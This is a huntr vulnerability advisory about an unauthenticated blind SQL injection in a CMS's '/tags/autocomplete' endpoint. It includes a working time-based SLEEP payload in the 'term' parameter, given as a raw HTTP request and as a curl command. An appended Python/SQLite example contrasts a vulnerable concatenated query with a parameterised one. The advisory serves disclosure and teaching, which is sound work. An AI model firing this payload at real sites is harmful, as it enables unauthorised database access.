huntr / legpains / FE9809B6-40AD-4E81-9197-A9AA42E8A7BF
History: Aug 02, 2023 - 4:31 a.m.

Unauthenticated Blind SQL Injection in '/tags/autocomplete'

www.huntr.dev
Tags: unauthenticated attacker, sql injection, sanitize parameter

EPSS: 0.001 (percentile 49.6%)

Description

The application was found to be vulnerable to an unauthenticated blind SQL injection in the /tags/autocomplete page.
Input supplied via the GET parameter term is not sufficiently sanitized.

Proof of Concept

  1. Make a GET request to http://icms.local/tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' and observe that the server's response is delayed by the injected SLEEP.

       GET /tags/autocomplete?term=')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=' HTTP/1.1
       Host: icms.local
       X-Requested-With: XMLHttpRequest

  2. Replace the hostname below where necessary:

       curl -i -s -k -X $'GET' \
           -H $'Host: icms.local' -H $'X-Requested-With: XMLHttpRequest' \
           $'http://icms.local/tags/autocomplete?term=\')+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))x)+AND+(1=\''

  3. As long as X-Requested-With: XMLHttpRequest is present in the HTTP request headers, an unauthenticated attacker can send the request directly and inject into the affected parameter.

Remedial Action

It is recommended to sanitize the affected parameter term.
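Added example, not part of the advisory or of the affected project's code: a Python/SQLite stand-in for a tags autocomplete handler, showing the string-concatenated query this class of bug comes from beside a parameterised version that treats the same term value as data. The table name, column name and sample tags are assumptions.

```python
import sqlite3

# Constructed stand-in for the application's tag store; the affected CMS's real
# schema is not given in the advisory, so the table, column and rows are assumed.
SAMPLE_TAGS = ["security", "secrets", "sql", "php", "python"]

# The term value from the advisory's proof of concept (URL-decoded). SQLite has
# no SLEEP() function, so here it only shows whether the text is parsed as SQL.
ADVISORY_PAYLOAD = "') AND (SELECT 1 FROM (SELECT(SLEEP(10)))x) AND (1='"

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tags (name TEXT)")
    conn.executemany("INSERT INTO tags VALUES (?)", [(t,) for t in SAMPLE_TAGS])
    return conn

def vulnerable_autocomplete(conn, term):
    # Unsafe: term is spliced into the SQL text, so a quote in the value closes
    # the string literal and whatever follows is executed as SQL.
    sql = "SELECT name FROM tags WHERE (name LIKE '" + term + "%')"
    return [row[0] for row in conn.execute(sql)]

def safe_autocomplete(conn, term, limit=10):
    # Safe: term is bound as a query parameter, so quotes and keywords in it are
    # data, never syntax. LIKE wildcards are escaped so % and _ match literally.
    pattern = term.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")
    sql = "SELECT name FROM tags WHERE name LIKE ? ESCAPE '\\' ORDER BY name LIMIT ?"
    return [row[0] for row in conn.execute(sql, (pattern + "%", limit))]

def reaches_sql_engine(conn, term):
    # True when the vulnerable handler hands the term to the engine as SQL: the
    # engine then fails on the unknown SLEEP() function instead of matching text.
    try:
        vulnerable_autocomplete(conn, term)
    except sqlite3.OperationalError as exc:
        return "SLEEP" in str(exc).upper()
    return False

if __name__ == "__main__":
    db = make_db()
    print(safe_autocomplete(db, "se"))               # ['secrets', 'security']
    print(safe_autocomplete(db, ADVISORY_PAYLOAD))   # []
    print(reaches_sql_engine(db, ADVISORY_PAYLOAD))  # True
```

With the bound parameter the advisory's term value simply matches no tag, while the concatenated version hands it to the database as SQL.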
